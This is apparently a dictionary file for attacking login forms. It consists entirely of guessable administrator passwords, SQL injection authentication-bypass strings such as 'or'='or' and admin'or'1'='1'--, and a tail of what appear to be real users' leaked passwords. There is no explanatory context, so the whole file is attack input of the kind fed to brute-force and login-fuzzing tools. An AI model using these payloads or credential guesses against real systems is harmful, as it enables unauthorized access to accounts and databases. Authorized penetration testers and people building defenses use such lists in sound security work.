admin
admin111
admin222
admin333
admin444
admin555
admin666
admin777
admin888
admin999
admin000
admin123
admin9
admin1
admin89
admin12
admin789
admin6789
admin1234
admin56789
123456
1234567
12345678
1234567890
0123456
01234567
012345678
0123456789
'or'='or'
1'or'1'='1 
admin'or'1'='1'-- 
'or¡¯¡¯=' 
" or "a"="a 
') or (¡¯a¡¯='a 
or 1=1-- ' 
or ¡¯a¡¯='a 
'or''=' 
'or'1'='1 
"or=or"
'or''=''or''='
'or'='1'
'or' '1'='1
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
admin12345
admin456789
456789
admin123456
admin3456789
3456789
admin1234567
admin23456789
23456789
admin12345678
admin123456789
123456789
sa
root
sasa
user
administrator
administrators
000000
111111
111222
password
username
88888888
666666
aaa123
abcd
abcd1234
abcd123
123abcd
ffffff
abcde
abcdef
abcdefg
www
wwwroot
zzzzzz
wwwwww
netuser
520
5201314
101010
iloveyou
database
test
guest
test123
sql
server
webmaster
anonymous
passwd
pass
oracle
news
account
access
backup
fuck
fuckyou
1314520
5757124
530520
20121212
1314520
5757124
530520
20121212
111111
222222
333333
444444
555555
666666
777777
888888
999999
000000
88888888
110119120
654321
54321
000000
0000000
database
yuhuwan
stlhedu
lhlrxx
dezhou001
10086
jmsh4684967
hty888@a
dg856421
zhuliang521
bey757504
lxl13978307094
lxpangeladmin
ioricyr520
cfy643282
520lijiaoai
kikicoco
531b6b
xfwmg001
xukun4939192
0791idc
18464513.
hellojiuqi
yaoyao11
hannuo2013
Passw0rd
liujingmin
guestwly
cyrQWERTASDFG
ruipu38
fmw163516
djwml198419
itcinventecx
zuiaifeifei
ljj9814154
5201314wms
dengwenwu1984
onetwothree123
iloveshijian
jj88877368
13392012121
hryq6269
372521612
akkjl6095533
jiangyirczx
sxaz,123456
liujia68816176
dx_admin
abc123
abc123456
ABC123
hacker
dengzheng